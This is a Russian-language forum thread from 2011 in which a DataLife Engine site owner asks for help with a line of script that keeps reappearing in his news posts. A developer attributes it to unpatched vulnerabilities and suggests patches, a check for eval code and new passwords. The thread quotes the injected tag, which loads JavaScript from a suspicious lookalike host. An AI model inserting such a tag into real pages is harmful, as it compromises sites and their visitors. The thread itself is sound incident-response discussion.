Goloter 0 Опубликовано: 17 января 2011 Рассказать Опубликовано: 17 января 2011 Здравствуйте! Проблемка с сайтом ***** в конец новости постоянно добавляется сторчка, если вырезаешь, через время опять появляется, подскажите пожалуйста файлик со скриптом добавления новостей, может он где то там прописался и теперь постоянно добавляет эту строчку. <script src="http://goooogle.ipq.co/500a97199196d2fa494d0b1cd92c22fa.js" type="text/javascript"></script> Заранее благодарен за помощь! Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 17 января 2011 Рассказать Опубликовано: 17 января 2011 Goloter, пишите мне в ICQ, попробуем решить Вашу проблему Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 17 января 2011 Рассказать Опубликовано: 17 января 2011 Goloter, Вы используете старую версию скрипта, при этом на сайте не установлены патчи безопасности http://dle-news.ru/bags/ в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html и скорее всего другие. Ссылку на сайт удалил, т.к. ваш сайт уязвим. Ставьте незамедлительно все патчи. проверьте все файлы после этого в папке engine/data/ на наличие постороннего кода, например eval, меняйте все пароли после этого, в том числе и на БД Цитата Ссылка на сообщение Поделиться на других сайтах
Goloter 0 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 (изменено) Автор Goloter, Вы используете старую версию скрипта, при этом на сайте не установлены патчи безопасности http://dle-news.ru/bags/ в частности http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html и скорее всего другие. Ссылку на сайт удалил, т.к. ваш сайт уязвим. Ставьте незамедлительно все патчи. проверьте все файлы после этого в папке engine/data/ на наличие постороннего кода, например eval, меняйте все пароли после этого, в том числе и на БД да исользуем старую версию скрипта (7.5 пишет), постарался внести все багфиксы, с несколькими возникли проблемы 1 - Моя ссылка вот эту строку $source = str_replace( "`", "`", $source ); в файле engine/classes/parse.class.php не нашел ни вручную ни поиском по тексту( 2 - Моя ссылка тут вообще не нашлось файла engine/classes/thumb.class.php проверил engine/data/ на наличие eval - пусто так же после внесения багфиксов появилась ошибка при редактировании шаблона через админпанель Warning: fopen(/home/gelion/domains/gelion-dogs.kiev.ua/public_html/templates/Test/tagscloud.tpl): failed to open stream: Permission denied in /home/gelion/domains/gelion-dogs.kiev.ua/public_html/engine/inc/templates.php on line 189 Warning: fclose(): supplied argument is not a valid stream resource in /home/gelion/domains/gelion-dogs.kiev.ua/public_html/engine/inc/templates.php on line 191 чет ясовсем запутался((( помогите пожалуйста решить проблему! Изменено 18 января 2011 пользователем Goloter Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 1 - Моя ссылка вот эту строку $source = str_replace( "`", "`", $source );в файле engine/classes/parse.class.php не нашел ни вручную ни поиском по тексту( ищите строку $source = preg_replace( $find, $replace, $source ); и ниже добавляйте $source = preg_replace( "#<iframe#i", "<iframe", $source ); $source = preg_replace( "#<script#i", "<script", $source );[/code] 2 - Моя ссылка тут вообще не нашлось файла engine/classes/thumb.class.php значит вам этого править не нужно, на вашей версии этого файла еще не было. так же после внесения багфиксов появилась ошибка при редактировании шаблона через админпанель Warning: fopen(/home/gelion/domains/gelion-dogs.kiev.ua/public_html/templates/Test/tagscloud.tpl): failed to open stream: это не имеет отношения к установке патчей, ошибка означает что нет прав на запись в файл /templates/Test/tagscloud.tpl Цитата Ссылка на сообщение Поделиться на других сайтах
Goloter 0 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 Автор 1 - Моя ссылка вот эту строку $source = str_replace( "`", "`", $source );в файле engine/classes/parse.class.php не нашел ни вручную ни поиском по тексту( ищите строку $source = preg_replace( $find, $replace, $source ); и ниже добавляйте $source = preg_replace( "#<iframe#i", "<iframe", $source ); $source = preg_replace( "#<script#i", "<script", $source ); 2 - Моя ссылка тут вообще не нашлось файла engine/classes/thumb.class.php значит вам этого править не нужно, на вашей версии этого файла еще не было. так же после внесения багфиксов появилась ошибка при редактировании шаблона через админпанель Warning: fopen(/home/gelion/domains/gelion-dogs.kiev.ua/public_html/templates/Test/tagscloud.tpl): failed to open stream: это не имеет отношения к установке патчей, ошибка означает что нет прав на запись в файл /templates/Test/tagscloud.tpl Огромное человеческое вам спасибо! вот именно этой строчки и не хватало как я понимаю $source = preg_replace( "#<iframe#i", "<iframe", $source ); $source = preg_replace( "#<script#i", "<script", $source ); кстати может вам будет интересно, нашел в папке "uploads" папку "info", как она там появилась могу только догадываться, а в ней файлы с сайтом секс знакомст, причем удалить через фтп невозможно и последнее, хотел спросить у вас, как думаете стоит ли перейти на версию движка 9.2 и чего мне это будет стоить (в плане переделки шаблона, потери информации, будет ли работать форум) ? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 18 января 2011 Рассказать Опубликовано: 18 января 2011 (в плане переделки шаблона, потери информации, будет ли работать форум) Шаблон надо будет обновлять под версию DLE 9.2 Если будете обновлять по инструкции, то ничего из информации не потеряете По поводу форума это вопрос задавайте разработчикам форума Цитата Ссылка на сообщение Поделиться на других сайтах
Goloter 0 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Автор (в плане переделки шаблона, потери информации, будет ли работать форум) Шаблон надо будет обновлять под версию DLE 9.2 Если будете обновлять по инструкции, то ничего из информации не потеряете По поводу форума это вопрос задавайте разработчикам форума понял, спасибо за ответ! если что можно будет обратиться к вам за помощью по обновлению шаблона? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 19 января 2011 Рассказать Опубликовано: 19 января 2011 Можно конечно Цитата Ссылка на сообщение Поделиться на других сайтах
fil3d 0 Опубликовано: 3 февраля 2011 Рассказать Опубликовано: 3 февраля 2011 (изменено) У меня появлялась такая же строчка со скриптом в конце новости. В настройках пользователей я нашел нового самозваного администратора, который видимо и дописывал скрипт. Метод авторизации в админпанели поменял на "Расширенный метод" Видимо мой сайт взломали через уязвимость в браузере интернет эксплоер, хотя я почти всегда юзаю мазилу. Как поменять пароль на базу данных ? И в чем смысл этого злостного скрипта ?! зачем это кто-то делает ? Изменено 3 февраля 2011 пользователем fil3d Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.